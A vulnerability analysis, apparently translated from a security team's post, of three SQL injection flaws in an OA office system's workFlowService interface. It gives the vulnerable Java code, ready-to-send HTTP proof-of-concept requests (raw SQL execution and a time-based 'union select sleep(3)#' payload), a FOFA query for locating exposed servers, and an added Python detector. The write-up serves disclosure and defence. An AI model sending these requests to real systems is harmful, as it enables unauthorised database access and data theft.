Vulnerability description
The OA system discussed here (written "某天OA" in the original, with the vendor name redacted) is a collaborative office product marketed for its technical lead, practicality, ease of use, cost-effectiveness, simple deployment and flexible use. Its workFlowService interface contains multiple SQL injection vulnerabilities through which an attacker can read sensitive database contents or gain control of the server.
Vulnerability analysis
Earlier versions of the OA system (up to and including the 2016 release) use the Buffalo-Ajax service, which is no longer maintained. During the Servlet's init process the configuration is loaded and the services exposed to Buffalo remote calls are registered. The service is normally configured through the bundled file buffalo-service.properties.
Open /WEB-INF/classes/buffalo-service.properties and look up the class that workFlowService is mapped to.
It maps to com.oa8000.httrace.httrace01.manager.HtTrace01SqlProcess
Now audit that class.
SQL injection (1)
The interface contains the method getAwokeListData, shown below.
The key code reads the setStr parameter and parses it as JSON. It then takes the value of the JSON key k and checks whether it contains a colon separator: if it does, the part before the colon is used as the name of the database source to connect to and the part after it as the SQL statement to run; if it does not, the method connects to the current database directly and executes the whole string as SQL.
    public List getAwokeListData(String setStr) {
        if (setStr == null)
            return new ArrayList();
        String newSql = "";
        String dbSourceName = "";
        Connection con = null;
        Statement smt = null;
        ResultSet rs = null;
        Session hiSession = null;
        // setStr is client-supplied JSON; key "k" carries the SQL text
        JSONObject jObject = JSONObject.fromObject(setStr);
        String sql = jObject.getString("k");
        String[] sqlAndSource = sql.split(":");
        List list = new LinkedList();
        if (sqlAndSource.length > 1) {
            dbSourceName = sqlAndSource[0];   // "source:SQL" selects an external data source
            newSql = sqlAndSource[1];
        } else {
            newSql = sqlAndSource[0];         // no colon: run against the current database
        }
        hiSession = null;
        boolean innerDbFlg = (dbSourceName == null || "".equals(dbSourceName));
        try {
            hiSession = TransactionManager.getInstance().getCurrentSession();
            if (innerDbFlg) {
                con = hiSession.connection();
            } else {
                con = (new HiOaBaseSQLManager(hiSession)).userOuterDbSource(dbSourceName);
            }
            smt = con.createStatement();
            rs = smt.executeQuery(newSql);    // client-controlled SQL executed verbatim
            // ... (the rest of the method is not shown in the original excerpt)
Following the Buffalo-Ajax request format, the request body below names the method getAwokeListData in the method element and passes the parameter {"k":"SELECT database()","v":""}.
    POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
    Host:
    Accept-Encoding: identity
    Content-Length: 103
    Accept-Language: zh-CN,zh;q=0.8
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
    Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
    Connection: keep-alive
    Cache-Control: max-age=0

    <buffalo-call>
    <method>getAwokeListData</method>
    <string>{"k":"SELECT database()","v":""}</string>
    </buffalo-call>
The response directly returns the database name.
SQL injection (2)
The second SQL injection is in the same service, in the method named getAfterUserID.
The key line is:
    String sql = "SELECT user_id FROM user_user WHERE user_id in (" + tracedUsers + ",'" + userId + "') " + " order by user_order ";
Both parameters are concatenated straight into the SQL statement and executed, which is the injection.
Construct the following request and verify it with a time-based injection.
    POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
    Host:
    Accept-Encoding: identity
    Content-Length: 103
    Accept-Language: zh-CN,zh;q=0.8
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
    Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
    Connection: keep-alive
    Cache-Control: max-age=0

    <buffalo-call>
    <method>getAfterUserID</method>
    <string>1</string>
    <string>1') union select sleep(3)#</string>
    </buffalo-call>
The response is delayed by 3 seconds.
SQL injection (3)
The last method is named getDataListForTree.
It calls the getDatas method, whose code is as follows.
    public List getDatas(String sql) throws OaException {
        if (sql == null || "".equals(sql))
            return new ArrayList();
        Session hiSession = null;
        try {
            hiSession = TransactionManager.getInstance().getCurrentSession();
            HiOaBaseSQLManager event = new HiOaBaseSQLManager(hiSession);
            return event.executeQuerySQL(sql);   // sql comes straight from the request
        } catch (Exception e) {
            e.printStackTrace();
            throw new OaException(e.getMessage());
        } finally {
            if (hiSession != null)
                hiSession.close();
        }
    }
The sql parameter is executed directly as a query. The request body is constructed as follows.
    POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
    Host:
    Accept-Encoding: identity
    Content-Length: 103
    Accept-Language: zh-CN,zh;q=0.8
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
    Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
    Connection: keep-alive
    Cache-Control: max-age=0

    <buffalo-call>
    <method>getDataListForTree</method>
    <string>select user()</string>
    </buffalo-call>
The query result is returned directly.
Vulnerability summary
These SQL injection vulnerabilities exist because the code either concatenates request parameters into SQL statements or exposes a raw database query operation to callers without authorization, so that arbitrary attacker-supplied SQL is ultimately executed.
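As an added defensive example (not code from the original post), the following Python classifies Buffalo-Ajax request bodies sent to the workFlowService endpoint: getAwokeListData and getDataListForTree are flagged on any call, because their argument is executed as SQL by design, while getAfterUserID is flagged only when an argument carries SQL syntax instead of a plain identifier. The request bodies, including one benign-looking call, are constructed sample data.

```python
import re
import xml.etree.ElementTree as ET

ENDPOINT = "/OAapp/bfapp/buffalo/workFlowService"
# Argument *is* the SQL by design, so any network call to these is reportable.
SQL_BY_DESIGN = {"getAwokeListData", "getDataListForTree"}
# Arguments are spliced into a SQL string; flag only when they carry SQL syntax.
CONCATENATED = {"getAfterUserID"}
# Quote-closing, statement keywords, comment markers and time-based probes.
SQL_SYNTAX = re.compile(r"'\s*\)|\b(?:select|union|sleep|benchmark|or|and)\b|--|#|/\*", re.I)

def parse_buffalo_call(body):
    """Return (method, [string args]) from a <buffalo-call> body, or None."""
    try:
        root = ET.fromstring(body.strip())
    except ET.ParseError:
        return None
    if root.tag != "buffalo-call":
        return None
    method = (root.findtext("method") or "").strip()
    return method, [(el.text or "") for el in root.findall("string")]

def assess_request(path, body):
    """Classify one request as 'ignore', 'ok' or 'alert'."""
    if path != ENDPOINT or (parsed := parse_buffalo_call(body)) is None:
        return "ignore"
    method, args = parsed
    if method in SQL_BY_DESIGN:
        return "alert"
    if method in CONCATENATED and any(SQL_SYNTAX.search(a) for a in args):
        return "alert"
    return "ok"

def scan(requests):
    """(method, verdict) for every request to the endpoint; others dropped."""
    return [(parse_buffalo_call(b)[0], v) for p, b in requests
            if (v := assess_request(p, b)) != "ignore"]

# Constructed sample traffic: the three bodies from the write-up plus one
# benign-looking getAfterUserID call that carries only quoted/numeric ids.
SAMPLE_REQUESTS = [
    (ENDPOINT, '<buffalo-call><method>getAwokeListData</method>'
               '<string>{"k":"SELECT database()","v":""}</string></buffalo-call>'),
    (ENDPOINT, "<buffalo-call><method>getAfterUserID</method><string>1</string>"
               "<string>1') union select sleep(3)#</string></buffalo-call>"),
    (ENDPOINT, "<buffalo-call><method>getDataListForTree</method>"
               "<string>select user()</string></buffalo-call>"),
    (ENDPOINT, "<buffalo-call><method>getAfterUserID</method><string>'7','8'</string>"
               "<string>9</string></buffalo-call>"),
]
```

Running scan(SAMPLE_REQUESTS) yields three alerts and one "ok"; in practice the rule would sit in a WAF or log pipeline in front of the /OAapp/bfapp/buffalo/ path.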
Asset discovery
FOFA query
    app="华天动力-OA8000"
Exploitation
The three PoCs are the three requests already shown in the analysis sections above.
Originally published on the WeChat official account C4安全团队: 某天OA workFlowService multiple SQL injection vulnerability analysis